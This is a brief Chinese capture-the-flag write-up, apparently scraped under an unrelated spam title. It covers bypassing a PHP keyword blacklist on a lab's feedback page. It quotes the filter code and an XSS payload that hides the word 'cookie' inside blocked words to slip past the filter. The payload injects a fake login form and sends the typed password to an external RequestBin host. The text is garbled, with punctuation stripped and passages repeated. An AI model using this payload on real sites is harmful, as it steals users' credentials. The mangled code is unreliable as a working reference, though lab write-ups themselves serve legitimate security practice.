自己做网站翻译服务器 - 添加网站,wordpress上传主题提示要ftp,wordpress怎样去掉手机自适应效果,网站支持ipv6怎么做进入靶场 修改了url后才到了注册页面
注测后再登录 查看源码
都点进去看看 有个反馈页面
再查看源码 又有收获
// 检查$feedback是否为数组
if (is_array($feedback)) {// 如果是数组#xff0c;弹出提示框提示反馈不合法echo scriptalert(反馈不合法);…
进入靶场 修改了url后才到了注册页面
注测后再登录 查看源码
都点进去看看 有个反馈页面
再查看源码 又有收获
// 检查$feedback是否为数组
if (is_array($feedback)) {// 如果是数组弹出提示框提示反馈不合法echo scriptalert(反馈不合法);/script;// 返回false表示反馈不符合要求return false;
}
// 定义一个黑名单数组包含一些不允许在反馈中出现的关键字和特殊字符
$blacklist [_, \, , \\, #, %, input,script, iframe, host, onload, onerror,srcdoc, location,svg, form, img,src, getElement, document, cookie];
// 遍历黑名单数组
foreach ($blacklist as $val) {// 进入循环不断检查和替换while (true) {// 不区分大小写地检查$feedback中是否包含当前黑名单中的值if (stripos($feedback, $val)! false) {// 如果包含不区分大小写地将其从$feedback中替换为空字符串$feedback str_ireplace($val, , $feedback);} else {// 如果不包含跳出当前循环break;}}
}
用到下面网站
RequestBin — Collect, inspect and debug HTTP requests and webhooks incookieput typetext nameusername incookieput typepassword namepassword scrcookieipt scookierc./js/login.js/scrcookieipt scrcookieipt var psw docucookiement.getcookieElementsByName(password)[0].value; docucookiement.locacookietionhttp://http.requestbin.buuoj.cn/1a5ujib1/?apsw; /scrcookieipt 最后在网站上可以得到flag
